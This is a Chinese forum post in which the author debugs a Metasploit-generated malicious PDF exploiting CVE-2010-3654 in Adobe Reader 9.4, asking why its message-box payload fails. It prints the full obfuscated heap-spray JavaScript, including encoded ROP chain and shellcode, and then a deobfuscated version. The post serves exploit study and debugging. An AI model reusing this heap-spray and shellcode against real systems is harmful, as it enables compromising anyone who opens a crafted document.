下载了最新版本的metasploit framework 3.6,安装后使用metasploit GUI,用Exploits->windows->fileformat->adobe_flashplayer_button生成了msf.pdf,功能是弹出一个MessageBox对话框,生成的文件是利用了cve-2010-3654漏洞。
以下该程序都受到该漏洞的影响:
Windows, Macintosh, Linux and Solaris 下的Adobe Flash Player 10.1.85.3及更早的版本;
Android 移动平台下的Adobe Flash Player 10.1.95.2 及更早的版本;
Windows, Macintosh and UNIX 平台下的Adobe Reader 9.4 和 更早的 9.x 版本;
Windows 和 Macintosh 下的9.4 和更早的9.x 版本。
我的调试环境:
OS:winxp sp2 英文版
安装Adobe Reader 9.4.0
msf.pdf在该环境下运行产生异常,未实现原有功能弹出对话框,softice截获如下图:
可见,ESI地址所指向的内容未被初始化,在赋值给EAX时产生异常。
是heap spray的过程不成功,还是程序异常处理的问题呢?
在msf.pdf中,经解压接编码后提取了javascript代码:
var nMAgvzQKrRsugsftffsLleBANhoMWTjPjJJZQPakekmLkkQtVvGyfeQTVfImYYetRqSCbNWLVoPrRzpFBvQWvAPNnuhVWHLkUCos = unescape;
var UcUgJLqvOVFQxPYzELjUybxoYWwvfmFohHUFaRRCMmvDATo = nMAgvzQKrRsugsftffsLleBANhoMWTjPjJJZQPakekmLkkQtVvGyfeQTVfImYYetRqSCbNWLVoPrRzpFBvQWvAPNnuhVWHLkUCos( '%u0c0c%u0c0c%u2fe1%u0700%ucccc%ucccc%ucccc%ucccc%u0c1c%u0c0c%u4919%u0700%ucccc%ucccc%u48ef%u0700%u156f%u0700%ucccc%ucccc%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9033%u0700%u9084%u0700%u0c0c%u0c0c%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u1599%u0700%u0124%u0001%u72f7%u0700%u0104%u0001%u15bb%u0700%u1000%u0000%u154d%u0700%u15bb%u0700%u0300%u7ffe%u7fb2%u0700%u15bb%u0700%u0011%u0001%ua8ac%u0700%u15bb%u0700%u0100%u0001%ua8ac%u0700%u72f7%u0700%u0011%u0001%u52e2%u0700%u5c54%u0700%uffff%uffff%u0100%u0001%u0000%u0000%u0104%u0001%u1000%u0000%u0040%u0000%ud731%u0700%u15bb%u0700%u905a%u9054%u154d%u0700%ua722%u0700%u15bb%u0700%ueb5a%u5815%u154d%u0700%ua722%u0700%u15bb%u0700%u1a8b%u1889%u154d%u0700%ua722%u0700%u15bb%u0700%uc083%u8304%u154d%u0700%ua722%u0700%u15bb%u0700%u04c2%ufb81%u154d%u0700%ua722%u0700%u15bb%u0700%u0c0c%u0c0c%u154d%u0700%ua722%u0700%u15bb%u0700%uee75%u05eb%u154d%u0700%ua722%u0700%u15bb%u0700%ue6e8%uffff%u154d%u0700%ua722%u0700%u15bb%u0700%u90ff%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%uffff%u90ff%u154d%u0700%ud731%u0700%u112f%u0700%ucdb8%u2d15%ud9c6%ud9ca%u2474%u5af4%uc931%u44b1%u4231%u8314%ufcea%u4203%u2f10%uf4e0%u342d%u73d2%ube96%ua9d4%u4964%u8726%u3eed%u2739%u3665%uccb6%uaa0f%u944d%u59e7%u392f%u6b73%u76e8%ue69b%ud0fb%ud99a%u0303%u52fc%ue097%uefd9%ud52d%ubbaa%u5d85%ua9ac%ud75d%ua6b6%uc838%u53c7%u3c5f%u2881%ub694%uc010%u37e4%udc23%u64fb%u1cc0%u7277%u5308%u7d75%u804d%u4672%u722d%ucc53%uf12c%u0af9%ueeae%ud998%ubbbc%u84ef%u3aa0%ub31b%ub7dd%u2cda%u8354%ub0f8%uc806%uc1b3%u1ae1%u343a%u6078%u3955%u6a35%u174a%ued22%u676d%u984d%u9cd7%ue409%u7e0f%u9f1e%u5bac%u77b3%u5c42%u78cc%ue6d2%uee3b%u8489%uaf1b%u6639%u016e%ue0de%u2efb%u837b%u8c8b%u69a7%uca05%u92fe%u1640%uae76%uad3b%u8d20%u6df1%uceb7%udf2d%u8f50%u20d2%u385f%ua642%u99f8%u37f4%ubc9e%udf46%u5a2d%u6c34%u7f9f%uce32%u75fb%u0dca%ud26b%uf1ec%u8a4c%ua2a1%u6bca%u3652%u06bc%ude82%uf52d%u78e2%u4dda%ue886%u7f76%u7881%u5bca%uf101%u9232%u53f3%u84e6%uaca1%u16d8%u0286%u0d26%u410e' );
var UqTZVwdgKzkpexcphECnLXmrmgfWkbUoOWvlEOfNsUuANlgLfhiwIJmrgzPouBGBCSASbMOzomnIjzIIMYNup = nMAgvzQKrRsugsftffsLleBANhoMWTjPjJJZQPakekmLkkQtVvGyfeQTVfImYYetRqSCbNWLVoPrRzpFBvQWvAPNnuhVWHLkUCos( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (UqTZVwdgKzkpexcphECnLXmrmgfWkbUoOWvlEOfNsUuANlgLfhiwIJmrgzPouBGBCSASbMOzomnIjzIIMYNup.length + 20 + 8 < 65536) UqTZVwdgKzkpexcphECnLXmrmgfWkbUoOWvlEOfNsUuANlgLfhiwIJmrgzPouBGBCSASbMOzomnIjzIIMYNup+=UqTZVwdgKzkpexcphECnLXmrmgfWkbUoOWvlEOfNsUuANlgLfhiwIJmrgzPouBGBCSASbMOzomnIjzIIMYNup;
teUtBmx = UqTZVwdgKzkpexcphECnLXmrmgfWkbUoOWvlEOfNsUuANlgLfhiwIJmrgzPouBGBCSASbMOzomnIjzIIMYNup.substring(0, (0x0c0c-0x24)/2);
teUtBmx += UcUgJLqvOVFQxPYzELjUybxoYWwvfmFohHUFaRRCMmvDATo;
teUtBmx += UqTZVwdgKzkpexcphECnLXmrmgfWkbUoOWvlEOfNsUuANlgLfhiwIJmrgzPouBGBCSASbMOzomnIjzIIMYNup;
qKMnqzgBhmJODWGgSifEFjtbOZtOcyLPvnjPTCuKQRWCdHRbCCEToRjPToxBUbxzx = teUtBmx.substring(0, 65536/2);
while(qKMnqzgBhmJODWGgSifEFjtbOZtOcyLPvnjPTCuKQRWCdHRbCCEToRjPToxBUbxzx.length < 0x80000) qKMnqzgBhmJODWGgSifEFjtbOZtOcyLPvnjPTCuKQRWCdHRbCCEToRjPToxBUbxzx += qKMnqzgBhmJODWGgSifEFjtbOZtOcyLPvnjPTCuKQRWCdHRbCCEToRjPToxBUbxzx;
xfdMCowhzZiwAQuGixUrVLeuHqOgKiogbeYolfDPWWcyFeYRVbvWZTxbxRvrbkUPYFtVbkShnGQoYqWewWFSSTJUf = qKMnqzgBhmJODWGgSifEFjtbOZtOcyLPvnjPTCuKQRWCdHRbCCEToRjPToxBUbxzx.substring(0, 0x80000 - (0x1020-0x08) / 2);
var qacqPnNjszyQLvXuHytQKnPbcqUpovgzfPrzuGPcnYNBPyAiOaFhJeSIwOjfMlPMLdVRdYK = new Array();
for (RvHUeDSvlKuDdZvDPwcE=0;RvHUeDSvlKuDdZvDPwcE<0x1f0;RvHUeDSvlKuDdZvDPwcE++) qacqPnNjszyQLvXuHytQKnPbcqUpovgzfPrzuGPcnYNBPyAiOaFhJeSIwOjfMlPMLdVRdYK[RvHUeDSvlKuDdZvDPwcE]=xfdMCowhzZiwAQuGixUrVLeuHqOgKiogbeYolfDPWWcyFeYRVbvWZTxbxRvrbkUPYFtVbkShnGQoYqWewWFSSTJUf+"s";
不知道为什么会写的这么复杂,简化一下代码如下:
var a1 = unescape;
var a2 = a1( '%u0c0c%u0c0c%u2fe1%u0700%ucccc%ucccc%ucccc%ucccc%u0c1c%u0c0c%u4919%u0700%ucccc%ucccc%u48ef%u0700%u156f%u0700%ucccc%ucccc%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9033%u0700%u9084%u0700%u0c0c%u0c0c%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u1599%u0700%u0124%u0001%u72f7%u0700%u0104%u0001%u15bb%u0700%u1000%u0000%u154d%u0700%u15bb%u0700%u0300%u7ffe%u7fb2%u0700%u15bb%u0700%u0011%u0001%ua8ac%u0700%u15bb%u0700%u0100%u0001%ua8ac%u0700%u72f7%u0700%u0011%u0001%u52e2%u0700%u5c54%u0700%uffff%uffff%u0100%u0001%u0000%u0000%u0104%u0001%u1000%u0000%u0040%u0000%ud731%u0700%u15bb%u0700%u905a%u9054%u154d%u0700%ua722%u0700%u15bb%u0700%ueb5a%u5815%u154d%u0700%ua722%u0700%u15bb%u0700%u1a8b%u1889%u154d%u0700%ua722%u0700%u15bb%u0700%uc083%u8304%u154d%u0700%ua722%u0700%u15bb%u0700%u04c2%ufb81%u154d%u0700%ua722%u0700%u15bb%u0700%u0c0c%u0c0c%u154d%u0700%ua722%u0700%u15bb%u0700%uee75%u05eb%u154d%u0700%ua722%u0700%u15bb%u0700%ue6e8%uffff%u154d%u0700%ua722%u0700%u15bb%u0700%u90ff%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%uffff%u90ff%u154d%u0700%ud731%u0700%u112f%u0700%ucdb8%u2d15%ud9c6%ud9ca%u2474%u5af4%uc931%u44b1%u4231%u8314%ufcea%u4203%u2f10%uf4e0%u342d%u73d2%ube96%ua9d4%u4964%u8726%u3eed%u2739%u3665%uccb6%uaa0f%u944d%u59e7%u392f%u6b73%u76e8%ue69b%ud0fb%ud99a%u0303%u52fc%ue097%uefd9%ud52d%ubbaa%u5d85%ua9ac%ud75d%ua6b6%uc838%u53c7%u3c5f%u2881%ub694%uc010%u37e4%udc23%u64fb%u1cc0%u7277%u5308%u7d75%u804d%u4672%u722d%ucc53%uf12c%u0af9%ueeae%ud998%ubbbc%u84ef%u3aa0%ub31b%ub7dd%u2cda%u8354%ub0f8%uc806%uc1b3%u1ae1%u343a%u6078%u3955%u6a35%u174a%ued22%u676d%u984d%u9cd7%ue409%u7e0f%u9f1e%u5bac%u77b3%u5c42%u78cc%ue6d2%uee3b%u8489%uaf1b%u6639%u016e%ue0de%u2efb%u837b%u8c8b%u69a7%uca05%u92fe%u1640%uae76%uad3b%u8d20%u6df1%uceb7%udf2d%u8f50%u20d2%u385f%ua642%u99f8%u37f4%ubc9e%udf46%u5a2d%u6c34%u7f9f%uce32%u75fb%u0dca%ud26b%uf1ec%u8a4c%ua2a1%u6bca%u3652%u06bc%ude82%uf52d%u78e2%u4dda%ue886%u7f76%u7881%u5bca%uf101%u9232%u53f3%u84e6%uaca1%u16d8%u0286%u0d26%u410e' );
var a3 = a1( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (a3.length + 20 + 8 < 65536) a3+=a3;
teUtBmx = a3.substring(0, (0x0c0c-0x24)/2);
teUtBmx += a2;
teUtBmx += a3;
a4 = teUtBmx.substring(0, 65536/2);
while(a4.length < 0x80000) a4 += a4;
a5 = a4.substring(0, 0x80000 - (0x1020-0x08) / 2);
var a6 = new Array();
for (a7=0;a7<0x1f0;a7++) a6[a7]=a5+"s";
看了网上的一些介绍,上面a2应该是包括了异常处理部分和shellcode(实现弹出对话框),但是我不知道问题到底出在哪里,希望高手指点,谢谢!!!
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
上传的附件: